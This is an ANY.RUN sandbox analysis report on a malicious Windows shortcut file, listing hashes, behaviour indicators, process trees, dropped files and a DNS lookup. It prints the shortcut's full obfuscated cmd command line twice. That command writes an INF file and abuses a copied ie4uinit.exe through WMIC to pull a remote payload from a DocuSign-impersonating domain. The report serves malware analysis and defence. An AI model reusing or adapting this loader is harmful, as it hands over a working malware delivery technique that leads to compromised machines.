analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

45593a7071903724aae4974d478a17784cfca63af4d3404312fb4b5ecb9e0f1c

Full analysis: https://app.any.run/tasks/58f92791-2735-4bb1-8c2e-74894b313bac
Verdict: Malicious activity
Analysis date: October 07, 2021, 10:29:29
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/octet-stream
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=97, Archive, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=278528, window=hide
MD5:

D5DF5B266FC8C9AF26F6593F8EA771A8

SHA1:

B786A7C78B746CDA42F49211FC2E437AF17D1CE4

SHA256:

45593A7071903724AAE4974D478A17784CFCA63AF4D3404312FB4B5ECB9E0F1C

SSDEEP:

96:8yGcgoiDlGKUTk3KJzQcQlmtnwC1FVu/FtXN8i3wXtVaTRdSLqDyXtsHJr6uTist:8yGEoKTVe

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • ie4uinit.exe (PID: 856)
      • ie4uinit.exe (PID: 3732)

    • Drops executable file immediately after starts

      • cmd.exe (PID: 3388)

  • SUSPICIOUS

    • Checks supported languages

      • ie4uinit.exe (PID: 856)
      • ie4uinit.exe (PID: 3732)
      • WMIC.exe (PID: 1876)
      • cmd.exe (PID: 3388)

    • Reads the computer name

      • ie4uinit.exe (PID: 856)
      • WMIC.exe (PID: 1876)
      • ie4uinit.exe (PID: 3732)

    • Executed via WMI

      • ie4uinit.exe (PID: 856)

    • Executable content was dropped or overwritten

      • cmd.exe (PID: 3388)

    • Removes files from Windows directory

      • ie4uinit.exe (PID: 856)

    • Drops a file that was compiled in debug mode

      • cmd.exe (PID: 3388)

    • Application launched itself

      • ie4uinit.exe (PID: 856)

    • Creates files in the Windows directory

      • ie4uinit.exe (PID: 856)

    • Uses WMIC.EXE to create a new process

      • cmd.exe (PID: 3388)

    • Creates files in the user directory

      • cmd.exe (PID: 3388)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

MachineID: -
IconFileName: imageres.dll
CommandLineArguments: /v /c set "GTAZMGS4299=set" && call set "GTAZMGS0851=%GTAZMGS4299:~0,1%" && (for %j in (c) do @set "GTAZMGS1665=%~j") && !GTAZMGS0851!et "GTAZMGS89944=ure=$w" && !GTAZMGS0851!et "GTAZMGS55863=a" && set "GTAZMGS39107=t" && !GTAZMGS0851!et "GTAZMGS5644=d" && set "GTAZMGS68144=." && set "GTAZMGS5707=init" && set "GTAZMGS84148=e" && set "GTAZMGS28159=settings" && set "GTAZMGS1300=!GTAZMGS68144!inf" && !GTAZMGS0851!et "GTAZMGS5629=ieu!GTAZMGS5707!!GTAZMGS1300!" && call !GTAZMGS0851!et "GTAZMGS11336=%app!GTAZMGS5644!ata%\Micro!GTAZMGS0851!oft\" && !GTAZMGS0851!et "GTAZMGS53594=!GTAZMGS11336!!GTAZMGS5629!" && !GTAZMGS0851!et "GTAZMGS2081="^" && (for %x in ("[version]" "signat!GTAZMGS89944!indow!GTAZMGS0851! ntf7f81a39-5f63-5b42-9efd-1f13b5431005quot; "[!GTAZMGS5644!e!GTAZMGS0851!tinationdirs]" "mPPvq=01" "[!GTAZMGS5644!efaultin!GTAZMGS0851!tall.windows7]" "UnRegis!GTAZMGS39107!erOCXs=wyGHzZ" "!GTAZMGS5644!elfiles=mPPvq" "[wyGHzZ]" "%11%\scRo%GTAZMGS17745%j,NI,%GTAZMGS37749%%GTAZMGS0413%%GTAZMGS0413%p%GTAZMGS25026%%GTAZMGS9855%%GTAZMGS9855%docusign!GTAZMGS68144!uk!GTAZMGS68144!%GTAZMGS29707%/history!GTAZMGS68144!txt" "[mPPvq]" "ieu%GTAZMGS2306%!GTAZMGS1300!" "[!GTAZMGS0851!!GTAZMGS39107!rings]" "GTAZMGS2306=!GTAZMGS5707!" "GTAZMGS0413=t" "!GTAZMGS0851!ervicen!GTAZMGS55863!me=' '" "GTAZMGS37749=h" "GTAZMGS25026=:" "GTAZMGS9855=/" "!GTAZMGS0851!hortsvcn!GTAZMGS55863!me=' '" "GTAZMGS29707=com" "GTAZMGS17745=b") do @e!GTAZMGS1665!ho %~x)>"!GTAZMGS53594!" && !GTAZMGS0851!et "GTAZMGS06018=ie4u!GTAZMGS5707!.!GTAZMGS84148!xe" && call copy /Y %win!GTAZMGS5644!ir%\!GTAZMGS0851!ystem32\!GTAZMGS06018! "!GTAZMGS11336!" && !GTAZMGS0851!t!GTAZMGS55863!rt "" /MIN wmi!GTAZMGS1665! proce!GTAZMGS0851!s call !GTAZMGS1665!rea!GTAZMGS39107!e "!GTAZMGS11336!!GTAZMGS06018! -base!GTAZMGS28159!"
RelativePath: ..\..\..\..\
LocalBasePath: -
VolumeLabel: Windows
DriveType: Fixed Disk
TargetFileDOSName: -
HotKey: (none)
RunWindow: Normal
IconIndex: 97
TargetFileSize: 278528
FileAttributes: Archive
Flags: IDList, LinkInfo, RelativePath, CommandArgs, IconFile, Unicode, ExpString
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
4
Malicious processes
1
Suspicious processes
2

Behavior graph

Click at the process to see the details
start cmd.exe wmic.exe no specs ie4uinit.exe no specs ie4uinit.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3388"C:\Windows\System32\cmd.exe" /v /c set "GTAZMGS4299=set" && call set "GTAZMGS0851=%GTAZMGS4299:~0,1%" && (for %j in (c) do @set "GTAZMGS1665=%~j") && !GTAZMGS0851!et "GTAZMGS89944=ure=$w" && !GTAZMGS0851!et "GTAZMGS55863=a" && set "GTAZMGS39107=t" && !GTAZMGS0851!et "GTAZMGS5644=d" && set "GTAZMGS68144=." && set "GTAZMGS5707=init" && set "GTAZMGS84148=e" && set "GTAZMGS28159=settings" && set "GTAZMGS1300=!GTAZMGS68144!inf" && !GTAZMGS0851!et "GTAZMGS5629=ieu!GTAZMGS5707!!GTAZMGS1300!" && call !GTAZMGS0851!et "GTAZMGS11336=%app!GTAZMGS5644!ata%\Micro!GTAZMGS0851!oft\" && !GTAZMGS0851!et "GTAZMGS53594=!GTAZMGS11336!!GTAZMGS5629!" && !GTAZMGS0851!et "GTAZMGS2081="^" && (for %x in ("[version]" "signat!GTAZMGS89944!indow!GTAZMGS0851! ntf7f81a39-5f63-5b42-9efd-1f13b5431005quot; "[!GTAZMGS5644!e!GTAZMGS0851!tinationdirs]" "mPPvq=01" "[!GTAZMGS5644!efaultin!GTAZMGS0851!tall.windows7]" "UnRegis!GTAZMGS39107!erOCXs=wyGHzZ" "!GTAZMGS5644!elfiles=mPPvq" "[wyGHzZ]" "%11%\scRo%GTAZMGS17745%j,NI,%GTAZMGS37749%%GTAZMGS0413%%GTAZMGS0413%p%GTAZMGS25026%%GTAZMGS9855%%GTAZMGS9855%docusign!GTAZMGS68144!uk!GTAZMGS68144!%GTAZMGS29707%/history!GTAZMGS68144!txt" "[mPPvq]" "ieu%GTAZMGS2306%!GTAZMGS1300!" "[!GTAZMGS0851!!GTAZMGS39107!rings]" "GTAZMGS2306=!GTAZMGS5707!" "GTAZMGS0413=t" "!GTAZMGS0851!ervicen!GTAZMGS55863!me=' '" "GTAZMGS37749=h" "GTAZMGS25026=:" "GTAZMGS9855=/" "!GTAZMGS0851!hortsvcn!GTAZMGS55863!me=' '" "GTAZMGS29707=com" "GTAZMGS17745=b") do @e!GTAZMGS1665!ho %~x)>"!GTAZMGS53594!" && !GTAZMGS0851!et "GTAZMGS06018=ie4u!GTAZMGS5707!.!GTAZMGS84148!xe" && call copy /Y %win!GTAZMGS5644!ir%\!GTAZMGS0851!ystem32\!GTAZMGS06018! "!GTAZMGS11336!" && !GTAZMGS0851!t!GTAZMGS55863!rt "" /MIN wmi!GTAZMGS1665! proce!GTAZMGS0851!s call !GTAZMGS1665!rea!GTAZMGS39107!e "!GTAZMGS11336!!GTAZMGS06018! -base!GTAZMGS28159!"C:\Windows\System32\cmd.exe
Explorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1876wmic process call create "C:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings"C:\Windows\System32\Wbem\WMIC.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
856C:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exe -basesettingsC:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
IE Per-User Initialization Utility
Exit code:
0
Version:
11.00.9600.19597 (winblue_ltsb_escrow.191216-1311)
3732C:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exe -ClearIconCacheC:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exeie4uinit.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
IE Per-User Initialization Utility
Exit code:
0
Version:
11.00.9600.19597 (winblue_ltsb_escrow.191216-1311)
Total events
753
Read events
660
Write events
93
Delete events
0

Modification events

(PID) Process:(856) ie4uinit.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3
Operation:writeName:IEPropFontName
Value:
Times New Roman
(PID) Process:(856) ie4uinit.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3
Operation:writeName:IEFixedFontName
Value:
Courier New
(PID) Process:(856) ie4uinit.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\4
Operation:writeName:IEPropFontName
Value:
Times New Roman
(PID) Process:(856) ie4uinit.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\4
Operation:writeName:IEFixedFontName
Value:
Courier New
(PID) Process:(856) ie4uinit.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\5
Operation:writeName:IEPropFontName
Value:
Times New Roman
(PID) Process:(856) ie4uinit.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\5
Operation:writeName:IEFixedFontName
Value:
Courier New
(PID) Process:(856) ie4uinit.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\6
Operation:writeName:IEPropFontName
Value:
Times New Roman
(PID) Process:(856) ie4uinit.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\6
Operation:writeName:IEFixedFontName
Value:
Courier New
(PID) Process:(856) ie4uinit.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\7
Operation:writeName:IEPropFontName
Value:
Sylfaen
(PID) Process:(856) ie4uinit.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\7
Operation:writeName:IEFixedFontName
Value:
Sylfaen
Executable files
1
Suspicious files
0
Text files
6
Unknown types
0

Dropped files

PID
Process
Filename
Type
3388cmd.exeC:\Users\admin\AppData\Roaming\Microsoft\ieuinit.infini
MD5:6DB1797BCD95AAF5F11FCFDD990E55CE
SHA256:E42046AF91FC0852A2935925DB6E510A6B4B6C76DB46E8067FE70BD7FA4E717B
856ie4uinit.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\brndlog.txttext
MD5:3098BBDD84794F3429FE02E2D7781C48
SHA256:C25F444580905AE18DDB7C254C44A8E3FDAC5B359E347F2C130B8BF7706CDB81
856ie4uinit.exeC:\Windows\Temp\OLD4410.tmpini
MD5:6DB1797BCD95AAF5F11FCFDD990E55CE
SHA256:E42046AF91FC0852A2935925DB6E510A6B4B6C76DB46E8067FE70BD7FA4E717B
856ie4uinit.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Tiles\pin9728060290\msapplication.xmlxml
MD5:E153C6D960F845B74F1A90AE11670556
SHA256:4B906B6DB2836AAA38ED20EBD2D1F1DAE2394AFAD578EE83720A919C8D366D29
856ie4uinit.exeC:\Users\admin\Favorites\Links\Web Slice Gallery.urltext
MD5:1E7E5E93C2A5AADAF932F93D25C57F3E
SHA256:8B94D04FECE582E4182E8E73F46FB86EB8E965C69C526C42805ABB9E43641E35
3388cmd.exeC:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exeexecutable
MD5:ACA03178C248B32343B03F4B9ACCE1B9
SHA256:C3612DA14216A2F5872BD0D140A76D1A257E9668EFA46A5CED5419E51ED30B49
856ie4uinit.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\brndlog.baktext
MD5:E9E473C9777B0C24D50EE8C972A78FE2
SHA256:90BE32975E76E679B01FF719148DF508CBBE2D7F2C47D93201F33A31994B4174
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

Domain
IP
Reputation
docusign.uk.com
unknown

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
45593a7071903724aae4974d478a17784cfca63af4d3404312fb4b5ecb9e0f1c